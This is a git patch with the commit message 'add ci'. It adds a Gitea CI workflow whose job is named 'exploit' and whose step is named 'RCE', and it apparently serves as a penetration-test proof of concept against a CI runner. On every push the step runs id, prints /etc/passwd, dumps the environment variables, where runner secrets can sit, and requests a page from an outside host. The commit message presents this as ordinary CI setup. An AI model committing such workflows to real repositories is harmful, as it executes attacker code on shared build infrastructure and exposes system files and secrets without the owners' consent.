From e6449ea6cb4f60a4dd841f92dd9ec9864f1d5b04 Mon Sep 17 00:00:00 2001 From: pentest-audit Date: Tue, 12 May 2026 09:24:20 +0200 Subject: [PATCH] add ci --- .gitea/workflows/ci.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 .gitea/workflows/ci.yml diff --git a/.gitea/workflows/ci.yml b/.gitea/workflows/ci.yml new file mode 100644 index 0000000..ea5a57f --- /dev/null +++ b/.gitea/workflows/ci.yml @@ -0,0 +1,12 @@ +name: test +on: [push] +jobs: + exploit: + runs-on: ubuntu-latest + steps: + - name: RCE + run: | + id + cat /etc/passwd + env + curl http://api.hikka.host/api/statistic | head -c 100